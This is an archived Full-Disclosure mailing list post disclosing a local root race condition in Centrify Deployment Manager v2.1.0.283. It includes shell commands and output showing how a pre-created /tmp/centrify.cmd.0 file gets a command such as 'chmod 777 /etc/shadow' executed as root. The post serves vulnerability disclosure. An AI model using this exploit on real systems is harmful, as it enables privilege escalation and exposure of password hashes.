lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 08 Dec 2012 03:38:59 +0000 (GMT)
From: larry Cashdollar <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Cc: submissions@...ketstormsecurity.org
Subject: Centrify Deployment Manager v2.1.0.283 local root

Centrify Deployment Manager v2.1.0.283 local root
12/7/2012

Taking a little longer look at the software, I managed to win a race condition and get root with files in /tmp. Here is my analysis:

root@h0g:/tmp ls -l /etc/shadow
-r-------- 1 root shadow 1010 Dec 7 21:42 /etc/shadow root@h0g:/tmp

larry@h0g:/tmp$ ln -s /etc/shadow centrify.cmd.0 larry@h0g:/tmp$ ls -l
total 24
lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -> /etc/shadow After Analyze/Refresh Computer Information is run :

root@h0g:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow root@h0g:/tmp cat /etc/shadow
echo 144d823c-9c22-4d21-8446-4e2d07556177 vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null temp=$?
echo af43ab93-cfce-485e-b16f-0d4331e0e421 exit ${temp}
root@h0g:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow root@h0g:/tmp

This sucks we clobber the contents of /etc/shadow and we don't have write permission.

No root still.

Looking at the history and trace of what was run on the target system we see this:

Execute echo "echo 8c8ac888-342b-461f-a0ab-659251f3d602" > /tmp/centrify.cmd.0 Result =0 <----- if we create the file before them, we own it.  We can write to it before it's executed and have our command executed.

Execute echo "vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null" >> /tmp/centrify.cmd.0 Result =0
Execute echo "temp=\$?" >> /tmp/centrify.cmd.0 Result =0
Execute echo "echo b2449bef-65c1-45e8-9da0-4801200c5c05" >> /tmp/centrify.cmd.0 Result =0
Execute echo "exit \${temp}" >> /tmp/centrify.cmd.0 Result =0
Execute chmod 755 /tmp/centrify.cmd.0 Result =0 
Execute dzdo -p "Password:" sh -c "/tmp/centrify.cmd.0" Result =0 <--- dzdo is centrify's sudo equivalent, it's part of the centrify suite.
8c8ac888-342b-461f-a0ab-659251f3d602
b2449bef-65c1-45e8-9da0-4801200c5c05
Execute rm -rf /tmp/centrify.cmd.0 Result =0
Execute id -u Result =0

So our quick dirty exploit:

larry@h0g:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0 ; done

Will get us our command executed:

larry@h0g:/tmp$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow larry@h0g:/tmp$

It might work creating the file centrify.cmd.UID, then monitoring it for having the execute bit set with inotify (IN_ATTRIB). When the execute bit is set write our malicious command to the file as it about to be executed by root.

Hopefully Kayne won't smash´╗┐ my fingers with a hammer.  ;-)

Larry W. Cashdollar
http://vapid.dhs.org
@_larry0
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists